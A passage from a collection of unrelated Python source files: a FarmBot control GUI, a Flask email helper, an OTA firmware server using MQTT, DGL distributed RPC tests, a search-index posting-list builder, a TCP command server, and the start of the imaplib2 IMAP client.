arg_frame,arg_savePath, arg_filename): utils_tool.check_path(arg_savePath) # make sure output dir exists #if(not path.isdir(arg_savePath)): # makedirs(arg_savePath) #tmp= cv2.cvtColor(arg_frame, cv2.COLOR_RGB2BGR) cv2.imwrite(arg_savePath+arg_filename+'.jpg',arg_frame) def runningScript_run(self): cmd_file = open('tmp.txt', "r") lines = cmd_file.readlines() for line in lines: cols = line.split("#") print '***', self.StartRunScript_judge,line print("line=%s,cols_count=%i" %(line,len(cols))) if len(cols)>=1: cmd = cols[0] cmd = cmd.strip() if len(cmd)>0: print(">> "+cmd) cmd_code= cmd.strip().split(' ')[0].replace(' ','') if cmd_code[0]== 'C': if cmd_code[1:]== '00': TimeIndex= datetime.now().strftime('%Y%m%d%H%M%S') tmp_x, tmp_y, tmp_z= self.ArdMntr.get_CurPosition() imgName= '{0}_{1}_{2}_{3}'.format(TimeIndex, tmp_x, tmp_y, tmp_z) self.singleframe= self.CamMntr.get_frame() self.saveImg_function(self.singleframe, gui_vars.savePath, imgName) self.display_panel_singleframe(self.singleframe) else: while 1: if self.ArdMntr.cmd_state.is_ready(): #wait system ready to accept commands self.ArdMntr.serial_send("%s" %cmd) time.sleep(1) break else: time.sleep(1) time.sleep(1) if self.StartRunScript_judge== False: break cmd_file.close() print 'CLOSE FILE...' self.tabbox.tab(self.tab_control, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.Lock_tabloadscript(False) self.btn_runscript.config(text= 'RUN', fg='white', activeforeground= 'white', bg= self.bgGreen,activebackground= self.bgGreen_active) self.StartRunScript_judge= False def scanning_run(self): step=0 #while self.scanning_judge: if self.StartScan_judge: print '>>> Scanning...' for step_X in range(0, self.scan_X[2]): for step_Y in range(0, self.scan_Y[2]): if self.StartScan_judge== False: break if step_X % 2 ==0: tmp_step_Y= step_Y else: tmp_step_Y= self.scan_Y[2]- step_Y-1 tmp_X, tmp_Y= self.scan_X[0]+ step_X*self.scan_X[1], self.scan_Y[0]+ tmp_step_Y*self.scan_Y[1] #tmp_X, tmp_Y= self.scan_X[0]+ step_X*self.scan_X[1], self.scan_Y[0]+ step_Y*self.scan_Y[1] print '>> X, Y: ', tmp_X, ', ', tmp_Y #self.saveScanning= 'Raw_{0}_{1}.png'.format(self.scan_X[0]+ step_X*self.scan_X[1], self.scan_Y[0]+ step_Y*self.scan_Y[1]) self.ArdMntr.move_Coord(tmp_X, tmp_Y, self.input_Zpos) time.sleep(1) while 1: if (self.ArdMntr.cmd_state.is_ready()): time.sleep(0.5) #self.saveScanning= '{0}_'.format(step)+self.ArdMntr.cmd_state.strCurX+'_'+self.ArdMntr.cmd_state.strCurY #self.saveScanning= self.ArdMntr.cmd_state.strCurX+'_'+self.ArdMntr.cmd_state.strCurY self.saveScanning= '{0}_{1}'.format(tmp_X, tmp_Y) frame= self.CamMntr.get_frame() self.saveImg_function(frame, gui_vars.saveScanningPath,self.readmergeframeIndex+'_'+self.saveTimeIndex+'_'+self.saveScanning) result= frame.copy() self.display_panel_singleframe(result) #self.display_panel_mergeframe(result, step_X, step_Y) #self.display_panel_mergeframe(result, step_Y, step_X) #self.display_panel_mergeframe(result, tmp_step_Y, step_X) self.display_panel_mergeframe(result, tmp_step_Y, self.scan_X[2] - 1 - step_X) #2018.02.12 #print '>> display_panel X, Y: ', tmp_step_Y, ', ', self.scan_X[2] - 1 - step_X #2018.02.12 print self.saveScanning #time.sleep(2) break else: time.sleep(1) if self.StartScan_judge== False: break step= step+1 self.StartScan_judge= False self.Lock_tabcontrol(False) self.Lock_Menubar(False) self.tabbox.tab(self.tab_loadscript, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.btn_StartScan.config(text= 'Start Scan', fg='white', activeforeground='white', bg= self.bgGreen, activebackground= self.bgGreen_active) else: time.sleep(0.2) step=0 def check_frame_update(self): result = Image.fromarray(self.frame) result = ImageTk.PhotoImage(result) self.panel.configure(image = result) self.panel.image = result self.panel.after(8, self.check_frame_update) def main_run(self): frame= self.CamMntr.get_frame() if frame is not -1: frame= cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) frame = self.mark_cross_line(frame) frame= cv2.resize(frame,(self.frame_width,self.frame_height),interpolation=cv2.INTER_LINEAR) text='Arduino Connection Refused ...' text_water='' text_seed='' text_light='' #2018.02.12 color= (0,0,0) if self.ArdMntr.connect== True: if self.StartScan_judge == False: if self.ArdMntr.cmd_state.is_ready() : text= 'Idling ...' color = (0 , 255 , 0) else: text= 'Moving ...' color = (255,0,0) else: if self.ArdMntr.cmd_state.is_ready(): text= 'Processing...' color = (0 , 255 , 0) else: text= 'Scanning...'+'(X, Y)= ('+self.ArdMntr.cmd_state.strCurX+', '+self.ArdMntr.cmd_state.strCurY+')' color = (255,0,0) if self.ArdMntr.WaterOn: text_water= 'Water: On ' cv2.putText(frame, text_water,(10,70),cv2.FONT_HERSHEY_SIMPLEX, 0.7,(255,0,0),1) if self.ArdMntr.SeedOn: text_seed= 'Vaccum: On ' cv2.putText(frame, text_seed,(10,100),cv2.FONT_HERSHEY_SIMPLEX, 0.7,(255,0,0),1) cv2.putText(frame, text,(10,40),cv2.FONT_HERSHEY_SIMPLEX, 0.7,color,1) self.strStatus= text+ ' ; '+ text_water+ text_seed self.set_frame(frame) time.sleep(0.01) root = Tkinter.Tk() root.title("[FBTUG] offline Farmbot GUI for development") root.attributes('-zoomed', True) # FullScreen #root.attributes('-fullscreen', True) #-2018.02.20 app= App(root) root.mainloop()
email.py
# -*- coding: utf-8 -*- # @Author: chiranjeevi E # @File Name: sendmail.py from threading import Thread from flask import current_app, render_template from flask_mail import Mail, Message def send_async_email(app, msg): with app.app_context(): mail = Mail(app) mail.init_app(app) mail.send(msg) def send_email(to, subject, template, **kwargs): app = current_app._get_current_object() msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to],charset="utf8") msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', **kwargs) thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr
ota.py
#!/usr/bin/env python try: from http.server import BaseHTTPRequestHandler, HTTPServer from socketserver import ThreadingMixIn except ImportError: from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from SocketServer import ThreadingMixIn import argparse import json import os import paho.mqtt.client as mqtt import shutil from threading import Thread import time import socket import sys TIMEOUT = 3 active_connections = 0 last_request_time = time.time() class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): pass def OTAServerFactory(args): class OTAServer(BaseHTTPRequestHandler, object): def __init__(self, *args, **kwargs): super(OTAServer, self).__init__(*args, **kwargs) def log_message(self, format, *args): return def do_GET(self): global active_connections global last_request_time active_connections += 1 last_request_time = time.time() print('%s - (%s: %s) GET %s ' % (self.log_date_time_string(), self.address_string(), self.headers.get('User-Agent', ''), self.path)) if self.headers.get('If-None-Match', '').replace('"', '') == args.version: self.send_response(304) print('%s - (%s: %s) Done: 304 Not Modified' % ( self.log_date_time_string(), self.address_string(), self.headers.get('User-Agent', ''))) active_connections -= 1 return self.send_response(200) self.send_header('Content-Length', os.stat(args.file).st_size) self.send_header('ETag', args.version) self.end_headers() f = open(args.file, 'rb') shutil.copyfileobj(f, self.wfile) f.close() print('%s - (%s: %s) Done: 200 OK' % ( self.log_date_time_string(), self.address_string(), self.headers.get('User-Agent', ''))) active_connections -= 1 return OTAServer def timeout_thread(httpd): global active_connections global last_request_time while active_connections > 0 or time.time() < last_request_time + TIMEOUT: time.sleep(0.1) httpd.shutdown() def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] s.close() return ip def on_mqtt_connect(client, args, flags, rc): client.publish('%s/OTA/%s' % (args.target, args.name), 'http://%s:%d/' % (get_local_ip(), args.port)) client.disconnect() def main(): parser = argparse.ArgumentParser(description='OTA firmware/config upgrade') parser.add_argument('-f', '--file', required=True, help='File used for upgrade') parser.add_argument('-v', '--version', required=True, help='Version of the upgrade file') parser.add_argument('-n', '--name', required=True, help='The name of image type to publish, e.g. "Firmware", "Config", etc.') parser.add_argument('-t', '--target', default='BLE2MQTT', help='Host to upgrade. If left empty, will upgrade all hosts') parser.add_argument('-p', '--port', type=int, default=8000, help='HTTP server port') parser.add_argument('--mqtt-broker-server', help='MQTT broker server for initiating upgrade procedure. ' 'Default taken from configuration file') parser.add_argument('--mqtt-broker-port', type=int, help='MQTT broker port for initiating upgrade procedure. ' 'Default taken from configuration file') args = parser.parse_args() config = json.load(open('data/config.json')) if args.mqtt_broker_server is None: args.mqtt_broker_server = config['mqtt']['server']['host'] if args.mqtt_broker_port is None: args.mqtt_broker_port = config['mqtt']['server']['port'] # Connect to MQTT mqttc = mqtt.Client(userdata=args) mqttc.on_connect = on_mqtt_connect mqttc.connect(args.mqtt_broker_server, args.mqtt_broker_port) mqttc.loop_start() # Set up HTTP server httpd = ThreadedHTTPServer(("", args.port), OTAServerFactory(args)) Thread(target=timeout_thread, args=(httpd, )).start() print('Listening on port %d' % args.port) httpd.serve_forever() httpd.server_close() print('No new connection requests, shutting down') if __name__ == '__main__': main()
test_rpc.py
import os import time import socket import dgl import backend as F import unittest, pytest import multiprocessing as mp from numpy.testing import assert_array_equal from utils import reset_envs, generate_ip_config if os.name != 'nt': import fcntl import struct INTEGER = 2 STR = 'hello world!' HELLO_SERVICE_ID = 901231 TENSOR = F.zeros((1000, 1000), F.int64, F.cpu()) def foo(x, y): assert x == 123 assert y == "abc" class MyRequest(dgl.distributed.Request): def __init__(self): self.x = 123 self.y = "abc" self.z = F.randn((3, 4)) self.foo = foo def __getstate__(self): return self.x, self.y, self.z, self.foo def __setstate__(self, state): self.x, self.y, self.z, self.foo = state def process_request(self, server_state): pass class MyResponse(dgl.distributed.Response): def __init__(self): self.x = 432 def __getstate__(self): return self.x def __setstate__(self, state): self.x = state def simple_func(tensor): return tensor class HelloResponse(dgl.distributed.Response): def __init__(self, hello_str, integer, tensor): self.hello_str = hello_str self.integer = integer self.tensor = tensor def __getstate__(self): return self.hello_str, self.integer, self.tensor def __setstate__(self, state): self.hello_str, self.integer, self.tensor = state class HelloRequest(dgl.distributed.Request): def __init__(self, hello_str, integer, tensor, func): self.hello_str = hello_str self.integer = integer self.tensor = tensor self.func = func def __getstate__(self): return self.hello_str, self.integer, self.tensor, self.func def __setstate__(self, state): self.hello_str, self.integer, self.tensor, self.func = state def process_request(self, server_state): assert self.hello_str == STR assert self.integer == INTEGER new_tensor = self.func(self.tensor) res = HelloResponse(self.hello_str, self.integer, new_tensor) return res def start_server(num_clients, ip_config, server_id=0, keep_alive=False, num_servers=1, net_type='tensorpipe'): print("Sleep 1 seconds to test client re-connect.") time.sleep(1) server_state = dgl.distributed.ServerState( None, local_g=None, partition_book=None, keep_alive=keep_alive) dgl.distributed.register_service( HELLO_SERVICE_ID, HelloRequest, HelloResponse) print("Start server {}".format(server_id)) dgl.distributed.start_server(server_id=server_id, ip_config=ip_config, num_servers=num_servers, num_clients=num_clients, server_state=server_state, net_type=net_type) def start_client(ip_config, group_id=0, num_servers=1, net_type='tensorpipe'): dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse) dgl.distributed.connect_to_server( ip_config=ip_config, num_servers=num_servers, group_id=group_id, net_type=net_type) req = HelloRequest(STR, INTEGER, TENSOR, simple_func) # test send and recv dgl.distributed.send_request(0, req) res = dgl.distributed.recv_response() assert res.hello_str == STR assert res.integer == INTEGER assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR)) # test remote_call target_and_requests = [] for i in range(10): target_and_requests.append((0, req)) res_list = dgl.distributed.remote_call(target_and_requests) for res in res_list: assert res.hello_str == STR assert res.integer == INTEGER assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR)) # test send_request_to_machine dgl.distributed.send_request_to_machine(0, req) res = dgl.distributed.recv_response() assert res.hello_str == STR assert res.integer == INTEGER assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR)) # test remote_call_to_machine target_and_requests = [] for i in range(10): target_and_requests.append((0, req)) res_list = dgl.distributed.remote_call_to_machine(target_and_requests) for res in res_list: assert res.hello_str == STR assert res.integer == INTEGER assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR)) def test_serialize(): reset_envs() os.environ['DGL_DIST_MODE'] = 'distributed' from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload SERVICE_ID = 12345 dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse) req = MyRequest() data, tensors = serialize_to_payload(req) req1 = deserialize_from_payload(MyRequest, data, tensors) req1.foo(req1.x, req1.y) assert req.x == req1.x assert req.y == req1.y assert F.array_equal(req.z, req1.z) res = MyResponse() data, tensors = serialize_to_payload(res) res1 = deserialize_from_payload(MyResponse, data, tensors) assert res.x == res1.x def test_rpc_msg(): reset_envs() os.environ['DGL_DIST_MODE'] = 'distributed' from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage SERVICE_ID = 32452 dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse) req = MyRequest() data, tensors = serialize_to_payload(req) rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors) assert rpcmsg.service_id == SERVICE_ID assert rpcmsg.msg_seq == 23 assert rpcmsg.client_id == 0 assert rpcmsg.server_id == 1 assert len(rpcmsg.data) == len(data) assert len(rpcmsg.tensors) == 1 assert F.array_equal(rpcmsg.tensors[0], req.z) @unittest.skipIf(os.name == 'nt', reason='Do not support windows yet') def test_rpc(): reset_envs() os.environ['DGL_DIST_MODE'] = 'distributed' generate_ip_config("rpc_ip_config.txt", 1, 1) ctx = mp.get_context('spawn') pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt")) pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",)) pserver.start() pclient.start() pserver.join() pclient.join() @unittest.skipIf(os.name == 'nt', reason='Do not support windows yet') @pytest.mark.parametrize("net_type", ['socket', 'tensorpipe']) def test_multi_client(net_type): reset_envs() os.environ['DGL_DIST_MODE'] = 'distributed' ip_config = "rpc_ip_config_mul_client.txt" generate_ip_config(ip_config, 1, 1) ctx = mp.get_context('spawn') num_clients = 20 pserver = ctx.Process(target=start_server, args=(num_clients, ip_config, 0, False, 1, net_type)) pclient_list = [] for i in range(num_clients): pclient = ctx.Process(target=start_client, args=(ip_config, 0, 1, net_type)) pclient_list.append(pclient) pserver.start() for i in range(num_clients): pclient_list[i].start() for i in range(num_clients): pclient_list[i].join() pserver.join() @unittest.skipIf(os.name == 'nt', reason='Do not support windows yet') def test_multi_thread_rpc(): reset_envs() os.environ['DGL_DIST_MODE'] = 'distributed' num_servers = 2 generate_ip_config("rpc_ip_config_multithread.txt", num_servers, num_servers) ctx = mp.get_context('spawn') pserver_list = [] for i in range(num_servers): pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config_multithread.txt", i)) pserver.start() pserver_list.append(pserver) def start_client_multithread(ip_config): import threading dgl.distributed.connect_to_server(ip_config=ip_config, num_servers=1) dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse) req = HelloRequest(STR, INTEGER, TENSOR, simple_func) dgl.distributed.send_request(0, req) def subthread_call(server_id): req = HelloRequest(STR, INTEGER, TENSOR, simple_func) dgl.distributed.send_request(server_id, req) subthread = threading.Thread(target=subthread_call, args=(1,)) subthread.start() subthread.join() res0 = dgl.distributed.recv_response() res1 = dgl.distributed.recv_response() # Order is not guaranteed assert_array_equal(F.asnumpy(res0.tensor), F.asnumpy(TENSOR)) assert_array_equal(F.asnumpy(res1.tensor), F.asnumpy(TENSOR)) dgl.distributed.exit_client() start_client_multithread("rpc_ip_config_multithread.txt") pserver.join() @unittest.skipIf(os.name == 'nt', reason='Do not support windows yet') def test_multi_client_groups(): reset_envs() os.environ['DGL_DIST_MODE'] = 'distributed' ip_config = "rpc_ip_config_mul_client_groups.txt" num_machines = 5 # should test with larger number but due to possible port in-use issue. num_servers = 1 generate_ip_config(ip_config, num_machines, num_servers) # presssue test num_clients = 2 num_groups = 2 ctx = mp.get_context('spawn') pserver_list = [] for i in range(num_servers*num_machines): pserver = ctx.Process(target=start_server, args=(num_clients, ip_config, i, True, num_servers)) pserver.start() pserver_list.append(pserver) pclient_list = [] for i in range(num_clients): for group_id in range(num_groups): pclient = ctx.Process(target=start_client, args=(ip_config, group_id, num_servers)) pclient.start() pclient_list.append(pclient) for p in pclient_list: p.join() for p in pserver_list: assert p.is_alive() # force shutdown server dgl.distributed.shutdown_servers(ip_config, num_servers) for p in pserver_list: p.join() if __name__ == '__main__': test_serialize() test_rpc_msg() test_rpc() test_multi_client('socket') test_multi_client('tesnsorpipe') test_multi_thread_rpc()
Postings.py
from keras.preprocessing.text import Tokenizer import ujson import os import time from tqdm import tqdm import cProfile import copy import gc from multiprocessing import Pool, Manager from threading import Thread gc.enable() dir = "/home/zjq/WSM/" read_root = dir + "trials/" write_root = dir + "postingss/" words_path = dir + 'words.json' logs_path = dir + 'logs.json' if not os.path.exists(write_root): os.makedirs(write_root) doc_num = len(os.listdir(read_root)) posting_list = dict() letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '\'', '_'] # split into 38 x 38 tiny posting lists pre = [] for i in letters: for j in letters: pre.append(i + j) start_time = time.time() words, Logs = None, None if os.path.exists(words_path): print("loading words ...") with open(words_path) as f: words = ujson.load(f) if os.path.exists(logs_path): print("loading logs ...") with open(logs_path) as f: Logs = ujson.load(f) if words == None or Logs == None: file_name = read_root + "data.json" with open(file_name) as f: Logs = ujson.load(f) tokenizer = Tokenizer(filters='!"#$%&()*+,-./:;<=>?@[\\]^`{|}~\t\n') lenL = len(Logs) tokenizer.fit_on_texts(Logs) words = list(tokenizer.word_index.keys()) Logs = tokenizer.texts_to_sequences(Logs) # gc.collect() if not os.path.exists(words_path): with open(words_path, 'w+') as f: ujson.dump(words, f) if not os.path.exists(logs_path): with open(logs_path, 'w+') as f: ujson.dump(Logs, f) print('Tokenizer costs time: ', time.time() - start_time) # def f(let, words, Logs): def f(let): posting_list = [dict() for i in range(len(letters))] # print(len(Logs)) for i in tqdm(range(len(Logs))): for idx in range(len(Logs[i])): sti = str(i) word = words[Logs[i][idx] - 1] if word[0] == let: secletter = 0 if len(word) > 1 and word[1] in letters: secletter = letters.index(word[1]) if word not in posting_list[secletter]: posting_list[secletter][word] = dict() if sti not in posting_list[secletter][word]: posting_list[secletter][word][sti] = [] posting_list[secletter][word][sti].append(idx) for j in range(len(posting_list)): with open(write_root + let + letters[j] + '.json', 'w+') as f: ujson.dump(posting_list[j], f) del posting_list # gc.collect() def run_parallel(words, Logs): # using shared memory manager = Manager() words_ = manager.list(words) del words Logs_ = manager.list(Logs) del Logs # gc.collect() # parallel without memeory keeping increasing with Pool(processes=len(letters)) as pool: pros = [pool.apply_async(f, (let, words_, Logs_)) for let in letters] [pro.get() for pro in pros] if __name__ == '__main__': start_time = time.time() # run_parallel(words, Logs) for let in letters: f(let) # threads = [Thread(target=f, args=(p, words, Logs)) for p in pre] # [t.start() for t in threads] # [t.join() for t in threads] print('Posting list processing costs time: ', time.time() - start_time)
Server.py
from multiprocessing import Process, Manager import socket, logging import typing # This function gets executed when you run # python Server.py and its use is to test the code # so it will usually be empty def main(): logging.error("Run run_server instead") """ The Server class is the main builder for the Sockets over TCP. It will by default allow an unlimited number of clients, but it will accept only 1. When told so, it can accept multiple clients at once. When one client gets connected, the Server assigns one process to that client, and that process divides into two, one that operates from the point of view of the server, and a second one, as a daemon, who listens and runs the functions given in order_dict """ class Server(): def __init__(self, ip:str=None, port:int=12412, password:str=None, max_connections:int=-1, order_dict:dict={}): self.threaded = [False, False] logging.debug(f"Server.__init__(self, {ip}, {port}, {password}, {max_connections})") #self._clients_process = [] #self._clients_p_obj = [] self.__manager = Manager() self._client_from_addr = self.__manager.dict() self._process_from_addr = {} self.open = self.__manager.dict() self.order_dict = order_dict if(ip is None): ip = socket.gethostbyname_ex(socket.gethostname())[-1] if(type(ip) is list or type(ip) is tuple): ip = ip[-1] logging.warning(f"Ip set automatically to {ip}") ip = "127.0.0.1" logging.warning(f"Ip set automatically to {ip}") self.ip = ip self.port = int(port) self.password = password self.max_connections = int(max_connections) if max_connections >= -1 else -1 self._connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self._connection.bind((ip, port)) logging.info("Created new server") # listen_connections sets up {connections} connections, # that when connected by a client, will assign one new # thread to that client def listen_connections(self, connections:int=1, ip:str=None, port:int=None) -> None: logging.debug(f"Server.listen_connections(self, {connections}, {ip}, {port})") if(ip is None): ip = self.ip if(port is None): port = self.port else: self.port = int(port) if(self.threaded[0]): process = [] #miau for _ in range(connections): process.append(Process(target=self.new_connection, args=(ip, port))) print("stop") process[-1].start() for conn in process: conn.join() else: self.new_connection(ip, port) # new_connection is run by a client-assigned thread, # and it does wait for the client to send an order # that when parsed, will coincide with one of tge keys # of ord_dict, and so its value will be executed def new_connection(self, ip:str=None, port:int=None) -> None: logging.debug(f"Server.new_connection(self, {ip}, {port})") if(self.max_connections + 1 and len(self._client_from_addr) >= self.max_connections): return if(ip is None): ip = self.ip if(port is None): port = self.port self._connection.listen() listener, addr = self._connection.accept() logging.info(f"Connected new user: {addr}") self._client_from_addr[addr] = listener self.open[addr] = True if(self.threaded[1]): self._process_from_addr[addr] = Process(target=self.listen, args=(addr, listener))#, daemon=True) self._process_from_addr[addr].start() else: self.listen(addr,listener) # sendto (kind of) overloads socket.socket.sendto . # Given a message and an address, the server will # turn message into utf-8 formatted bytes, and it # will send it (if possible) to the client with the # given address def sendto(self, message:str, addr:tuple) -> "iterable": self._client_from_addr[addr].sendto(bytes(str(message), "utf-8"), addr) # sendall (kind of) overloads socket.socket.sendall . # Even if it is not tested, it theorically turns message # into utf-8 formatted bytes and sends it to all clients # in the socket server. def sendall(self, message:str): self._connection.sendall(bytes(str(message), "utf-8")) # listen will make use of listener to (if given one) # ask for a password, and then it will return a generator def listen(self, addr:tuple, listener:"socket.socket") -> "generator[str]": logging.debug("Client.listen(self)") if(not self.open[addr]): return with listener: timeout = 0 if(not self.password is None): wrong_att = 0 accepted = False while(not accepted): password = listener.recv(1024) decoded_password = password.decode("utf-8") if(password is None): timeout += 1 if(timeout > 9): self.open[addr] = False break elif(decoded_password != ''): timeout = 0 if(decoded_password == self.password): accepted = True del wrong_att del password del decoded_password else: wrong_att += 1 if(wrong_att > 3): del wrong_att self.open[addr] = False break while(self.open[addr]): data = listener.recv(1024) decoded_data = data.decode("utf-8") if(data is None): timeout += 1 logging.debug(f"Timeout of user {addr} increased to {timeout}") if(timeout > 9): logging.warning(f"User {addr} has disconnected") break elif(decoded_data != ''): timeout = 0 logging.info(f"Recived data '{decoded_data}' from address {addr}") self.parse_data(decoded_data, addr) del self._process_from_addr[addr] del self._client_from_addr[addr] del self.open[addr] # parse_data takes one string recieved from one client # and its address and executes (if found) any matches # separated by ';' in the string as keys in ord_dict # the functions in the values of the dict must take # addr as the first parameter even if unnecessary def parse_data(self, data:str, addr:str) -> None: #print(f"parse_data {data}") order = None args = (addr,) for arg in data.split(';'): new_ord = self.order_dict.get(arg.strip(), None) print(f"arg:{arg}, new_ord:{new_ord}") if(not new_ord is None): if(not order is None): print(f"{order}{args}") try: order(*args) except Exception as err: print("ERROR: {err}") order = new_ord args = (addr,) elif(arg.strip() != ''): args+=(arg.strip(),) if(not order is None): print(f"{order}{args}.") try: order(*args) except Exception as err: print(f"ERROR: {err}")
imaplib2.py
#!/usr/bin/env python """Threaded IMAP4 client. Based on RFC 2060 and original imaplib module. Public classes: IMAP4 IMAP4_SSL IMAP4_stream Public functions: Internaldate2Time ParseFlags Time2Internaldate """ __all__ = ("IMAP4", "IMAP4_SSL", "IMAP4_stream", "Internaldate2Time", "ParseFlags", "Time2Internaldate") __version__ = "2.19" __release__ = "2" __revision__ = "19" __credits__ = """ Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998. String method conversion by ESR, February 2001. GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001. IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002. GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002. PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002. IDLE via threads suggested by Philippe Normand <phil@respyre.org> January 2005. GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005. COMPRESS/DEFLATE contributed by Bron Gondwana <brong@brong.net> May 2009. STARTTLS from Jython's imaplib by Alan Kennedy. ID contributed by Dave Baggett <dave@baggett.org> November 2009. Improved untagged responses handling suggested by Dave Baggett <dave@baggett.org> November 2009. Improved thread naming, and 0 read detection contributed by Grant Edwards <grant.b.edwards@gmail.com> June 2010. Improved timeout handling contributed by Ivan Vovnenko <ivovnenko@gmail.com> October 2010.""" __author__ = "Piers Lauder <piers@janeelix.com>" __URL__ = "http://janeelix.com/piers/python/imaplib2" __license__ = "Python License" import binascii, os, Queue, random, re, select, socket, sys, time, threading, zlib select_module = select # Globals CRLF = '\r\n' Debug = None # Backward compatibility IMAP4_PORT = 143 IMAP4_SSL_PORT = 993 IDLE_TIMEOUT_RESPONSE = '* IDLE TIMEOUT\r\n' IDLE_TIMEOUT = 60*29 # Don't stay in IDLE state longer READ_POLL_TIMEMOUT = 30 # Without this timeout interrupted network connections can hang reader AllowedVersions = ('IMAP4REV1', 'IMAP4') # Most recent first # Commands CMD_VAL_STATES = 0 CMD_VAL_ASYNC = 1 NONAUTH, AUTH, SELECTED, LOGOUT = 'NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT' Commands = { # name valid states asynchronous 'APPEND': ((AUTH, SELECTED), False), 'AUTHENTICATE': ((NONAUTH,), False), 'CAPABILITY': ((NONAUTH, AUTH, SELECTED), True), 'CHECK': ((SELECTED,), True), 'CLOSE': ((SELECTED,), False), 'COMPRESS': ((AUTH,), False), 'COPY': ((SELECTED,), True), 'CREATE': ((AUTH, SELECTED), True), 'DELETE': ((AUTH, SELECTED), True), 'DELETEACL': ((AUTH, SELECTED), True), 'EXAMINE': ((AUTH, SELECTED), False), 'EXPUNGE': ((SELECTED,), True), 'FETCH': ((SELECTED,), True), 'GETACL': ((AUTH, SELECTED), True), 'GETANNOTATION':((AUTH, SELECTED), True), 'GETQUOTA': ((AUTH, SELECTED), True), 'GETQUOTAROOT': ((AUTH, SELECTED), True), 'ID': ((NONAUTH, AUTH, SELECTED), True), 'IDLE': ((SELECTED,), False), 'LIST': ((AUTH, SELECTED), True), 'LOGIN': ((NONAUTH,), False), 'LOGOUT': ((NONAUTH, AUTH, LOGOUT, SELECTED), False), 'LSUB': ((AUTH, SELECTED), True), 'MYRIGHTS': ((AUTH, SELECTED), True), 'NAMESPACE': ((AUTH, SELECTED), True), 'NOOP': ((NONAUTH, AUTH, SELECTED), True), 'PARTIAL': ((SELECTED,), True), 'PROXYAUTH': ((AUTH,), False), 'RENAME': ((AUTH, SELECTED), True), 'SEARCH': ((SELECTED,), True), 'SELECT': ((AUTH, SELECTED), False), 'SETACL': ((AUTH, SELECTED), False), 'SETANNOTATION':((AUTH, SELECTED), True), 'SETQUOTA': ((AUTH, SELECTED), False), 'SORT': ((SELECTED,), True), 'STARTTLS': ((NONAUTH,), False), 'STATUS': ((AUTH, SELECTED), True), 'STORE': ((SELECTED,), True), 'SUBSCRIBE': ((AUTH, SELECTED), False), 'THREAD': ((SELECTED,), True), 'UID': ((SELECTED,), True), 'UNSUBSCRIBE': ((AUTH, SELECTED), False), } UID_direct = ('SEARCH', 'SORT', 'THREAD') def Int2AP(num): """string = Int2AP(num) Return 'num' converted to a string using characters from the set 'A'..'P' """ val, a2p = [], 'ABCDEFGHIJKLMNOP' num = int(abs(num)) while num: num, mod = divmod(num, 16) val.insert(0, a2p[mod]) return ''.join(val) class Request(object): """Private class to represent a request awaiting response.""" def __init__(self, parent, name=None, callback=None, cb_arg=None): self.name = name self.callback = callback # Function called to process result self.callback_arg = cb_arg # Optional arg passed to "callback" self.tag = '%s%s' % (parent.tagpre, parent.tagnum) parent.tagnum += 1 self.ready = threading.Event() self.response = None self.aborted = None self.data = None def abort(self, typ, val): self.aborted = (typ, val) self.deliver(None) def get_response(self, exc_fmt=None): self.callback = None self.ready.wait() if self.aborted is not None: typ, val = self.aborted if exc_fmt is None: exc_fmt = '%s - %%s' % typ raise typ(exc_fmt % str(val)) return self.response def deliver(self, response): if self.callback is not None: self.callback((response, self.callback_arg, self.aborted)) return self.response = response self.ready.set() class IMAP4(object): """Threaded IMAP4 client class. Instantiate with: IMAP4(host=None, port=None, debug=None, debug_file=None, identifier=None) host - host's name (default: localhost); port - port number (default: standard IMAP4 port); debug - debug level (default: 0 - no debug); debug_file - debug stream (default: sys.stderr); identifier - thread identifier prefix (default: host). All IMAP4rev1 commands are supported by methods of the same name. Each command returns a tuple: (type, [data, ...]) where 'type' is usually 'OK' or 'NO', and 'data' is either the text from the tagged response, or untagged results from command. Each 'data' is either a string, or a tuple. If a tuple, then the first part is the header of the response, and the second part contains the data (ie: 'literal' value). Errors raise the exception class <instance>.error("<reason>"). IMAP4 server errors raise <instance>.abort("<reason>"), which is a sub-class of 'error'. Mailbox status changes from READ-WRITE to READ-ONLY raise the exception class <instance>.readonly("<reason>"), which is a sub-class of 'abort'. "error" exceptions imply a program error. "abort" exceptions imply the connection should be reset, and the command re-tried. "readonly" exceptions imply the command should be re-tried. All 